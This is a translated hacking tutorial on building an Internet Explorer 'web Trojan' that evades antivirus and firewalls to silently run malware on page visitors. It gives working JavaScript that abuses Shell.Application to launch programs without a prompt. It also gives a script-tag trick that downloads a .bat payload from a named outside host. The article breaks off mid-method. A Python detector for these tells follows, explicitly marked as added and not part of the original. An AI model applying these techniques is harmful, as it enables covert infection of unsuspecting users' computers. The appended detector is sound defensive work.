To build a perfect IE web Trojan we first need a standard for what "perfect" means. I personally think a perfect IE web Trojan should have at least the following four properties:
1. It evades antivirus software;
2. It does not trigger the (personal) network firewall;
3. It works on most IE versions (IE5.0, IE5.5 and IE6.0) on most Windows versions (Win98, WinMe, Win2000, WinXP and Win2003), ideally regardless of which service pack is installed;
4. It leaves no visible change in IE, so the viewer does not notice anything and it can stay quietly hidden for a long time.
(Note: the four points above refer only to the web page, not to the Trojan program itself. Our web Trojan is only responsible for running a specified Trojan program; the quality of that program is your own choice. Don't ask me for one, I won't write it!)
Meet these four points and your horse will live longer, stay younger and run faster......
Tempted? Don't rush. Let's first look at the shortcomings of the web Trojans already circulating on the Internet.
First: the IE web Trojan that exploits the old MIME vulnerability is still widespread. But this vulnerability is too old and applies to too few IE versions; it had a huge impact in its day, but by now almost everything has been patched, so the planting success rate of this kind of Trojan is fairly low.
Second: the IE web Trojan that uses the com.ms.activeX.ActiveXComponent vulnerability together with the WSH and FSO controls. The com.ms.activeX.ActiveXComponent vulnerability itself works on most IE versions; it is a good vulnerability with high exploitation value. But because it relies on the WSH and FSO controls, the same controls that popular viruses call, it can avoid network firewall alarms yet cannot escape antivirus software (Norton, for example).
Third: the IE web Trojan that uses the Object Data remote execution vulnerability together with the WSH and FSO controls (its typical representative is the Animation Shark web Trojan generator).
The biggest advantages of this Trojan are that it works on many IE versions and the vulnerability is newer, but it has the following shortcomings:
1. It uses mshta.exe to access the network and download the Trojan program, which triggers firewall alarms (Skynet firewall, for example);
2. Any IE web Trojan that uses the WSH and FSO controls cannot escape antivirus software (such as Norton), and the Shark web Trojan does use the WSH and FSO controls. Sigh...... what a pity......
3. The vulnerability requires the web server to support dynamic pages (ASP, JSP, CGI and so on), which places a requirement on the hosting server; after all, free and stable dynamic-page hosting is scarce. The vulnerability can also be exploited in MIME mail form (see my article on Security Focus: "Exploiting the wrong MIME vulnerability...... --- Exploitation of the IE Object Data remote execution vulnerability", http://www.xfocus.net/articles/200309/607.html), but testing found that this does not work on IE6.0.
After reading the analysis above, do you share this feeling: an army of a thousand is easy to raise but a good general is hard to find; horses come in herds but a thousand-li horse is hard to find! Don't worry. Let me put all of this together and build the perfect IE web Trojan I have in mind.
First of all, we need to get past antivirus software, so we cannot use the WSH and FSO controls: as long as we use them, we cannot escape Norton's pursuit. So what can we do?! Don't worry. After much hard work (and inspired by an accidental discovery in an ASP Trojan), I finally found a usable control, Shell.Application. It passes IE's security check, runs smoothly in a web page in the "My Computer" zone, and is easier to get execution rights for than WSH and FSO (cross-domain vulnerabilities can be used to reach that zone). See the following JavaScript code:
<script language="javascript" type="text/javascript">
var shell = new ActiveXObject("Shell.Application");
// Launch Notepad with its default verb (Open); unlike WSH/FSO there is no "allow?" prompt in the My Computer zone
shell.NameSpace("C:\\Windows\\").Items().Item("Notepad.exe").InvokeVerb();
</script>
Save this as test.htm and see whether Notepad opens by itself. Unlike WSH and FSO, no prompt asking whether to allow it to run appears. Note that test.htm works because a file opened from the local disk runs in the My Computer zone, which is exactly the zone the cross-domain vulnerability mentioned above is used to reach; also, on Windows 2000 the system directory is C:\WINNT, so adjust the path there. Interesting? We can now run any program whose path we know, but we want to run our own Trojan, so we still need to download it to the viewer's machine and find where it landed. One thing at a time:
1. Downloading the Trojan program to the viewer's computer.
There are many ways to do this, for example the Windows Help file protocol arbitrary-file-download vulnerability I mentioned before (its :), but we don't need it this time. Here are two better download methods:
Example 1: using the SCRIPT tag. IE fetches whatever the src attribute points at into its cache (Temporary Internet Files) before deciding whether it can run it; because the language attribute names no real script engine, the file is downloaded but never executed as script, so nothing visible happens. The code is as follows:
<script language="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></script>
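A page-level check for the two tells described above, as an added example that is not part of the original article or its tools: scan_html flags (1) script that instantiates Shell.Application and calls InvokeVerb or ShellExecute, and (2) a <script src> whose language attribute is not a real script engine and whose src ends in an executable or batch extension. The indicator names, the engine and extension lists, the three sample pages and the placeholder payload URL are all my own assumptions for the demonstration.

```python
# Added example, not from the original article: a static check for the two
# page-level tells of this web Trojan. Sample pages and the payload URL are
# constructed for the demonstration.
import re
from html.parser import HTMLParser

# language= values IE treats as script engines (assumption: version suffixes
# such as JavaScript1.2 are accepted too). Any other value on a <script src>
# means the file is fetched into the cache but never run as script.
SCRIPT_ENGINE_RE = re.compile(r"^(javascript|jscript|ecmascript|vbscript|vbs)[\d.]*$", re.I)
# File types a web Trojan would want dropped into the browser cache.
PAYLOAD_EXTENSIONS = (".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".hta")

# Shell.Application instantiation plus a verb call that launches a program.
SHELL_APP_RE = re.compile(
    r'new\s+ActiveXObject\s*\(\s*["\']shell\.application["\']\s*\)', re.I)
SHELL_VERB_RE = re.compile(r"\.\s*(InvokeVerb|ShellExecute)\s*\(", re.I)


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag's attributes and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # [{"attrs": {...}, "body": "..."}]
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append({
                "attrs": {k.lower(): (v or "") for k, v in attrs},
                "body": "",
            })
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> content as data, possibly in chunks.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def _path_of(url):
    """Strip query and fragment so the extension check sees only the path."""
    return url.split("?", 1)[0].split("#", 1)[0].lower()


def scan_html(html):
    """Return [(indicator, detail), ...] for the page-level tells found."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        attrs, body = script["attrs"], script["body"]

        # Tell 1: Shell.Application used to launch a program from the page.
        verb = SHELL_VERB_RE.search(body)
        if SHELL_APP_RE.search(body) and verb:
            findings.append(("shell_application_launch", verb.group(1)))

        # Tell 2: <script src> with a bogus language and an executable target.
        language = attrs.get("language", "").strip()
        src = attrs.get("src", "").strip()
        if src and language and not SCRIPT_ENGINE_RE.match(language):
            if _path_of(src).endswith(PAYLOAD_EXTENSIONS):
                findings.append(("silent_download_via_script_src", src))
    return findings


# Constructed samples (not real pages); the payload URL is a placeholder.
SAMPLE_LAUNCHER = r"""<html><body>
<script language="javascript" type="text/javascript">
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace("C:\\Windows\\").Items().Item("Notepad.exe").InvokeVerb();
</script>
</body></html>"""

SAMPLE_DOWNLOADER = """<html><body>
<script language="icyfoxlovelace" src="http://example.invalid/muma/payload.bat"></script>
</body></html>"""

SAMPLE_BENIGN = """<html><body>
<script language="javascript" src="/static/app.js"></script>
<script type="text/javascript">document.title = "hello";</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in [("launcher", SAMPLE_LAUNCHER),
                       ("downloader", SAMPLE_DOWNLOADER),
                       ("benign", SAMPLE_BENIGN)]:
        print(name, scan_html(page))
```

The launcher tell keys on the pairing of the object creation with a verb call rather than on the ProgID alone, since Shell.Application also has legitimate uses; the download tell keys on the combination of a non-engine language value and an executable extension, which is what separates the trick from an ordinary external script.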